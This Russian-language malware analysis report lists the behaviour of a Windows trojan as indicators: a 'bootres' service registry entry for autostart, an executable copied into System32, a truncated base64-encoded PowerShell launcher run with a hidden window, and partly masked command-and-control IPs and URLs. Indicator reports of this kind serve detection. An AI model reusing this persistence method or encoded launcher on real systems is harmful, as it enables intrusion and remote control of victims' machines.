Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\bootres] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\bootres] 'ImagePath' = '"<SYSTEM32>\msrd2x40\bootres.exe"'
- 'bootres' "<SYSTEM32>\msrd2x40\bootres.exe"
- 'bootres' <SYSTEM32>\msrd2x40\bootres.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAGYAZgBtAF8AdAB2AD0AKAAnAFcANQAnACsAKAAnAGcAcQAnACsAJwB3ACcAKQArACcAagBnACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAUgBQAHIATwBmAEkAbABFAFwAaABiAD...
- %HOMEPATH%\hb8cvhk\vg5ub1d\v40689hmw.exe
- <SYSTEM32>\msrd2x40\bootres.exe
- %HOMEPATH%\hb8cvhk\vg5ub1d\v40689hmw.exe в <SYSTEM32>\msrd2x40\bootres.exe
- '21#.#0.40.16':80
- '91.##1.54.71':8080
- http://ti###servis.com/cgi-bin/fqo/
- http://91.###.54.71:8080/xhV3ab0FyvcY/LgOkmylGA4sJ1Ar/5LS2Rkh0X7xllHkvho/ via 91.##1.54.71
- DNS ASK ti###servis.com
- '%HOMEPATH%\hb8cvhk\vg5ub1d\v40689hmw.exe'
- '<SYSTEM32>\msrd2x40\bootres.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABKAGYAZgBtAF8AdAB2AD0AKAAnAFcANQAnACsAKAAnAGcAcQAnACsAJwB3ACcAKQArACcAagBnACcAKQA7AC4AKAAnAG4AJwArACcAZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAUgBQAHIATwBmAEkAbABFAFwAaABiAD...' (со скрытым окном)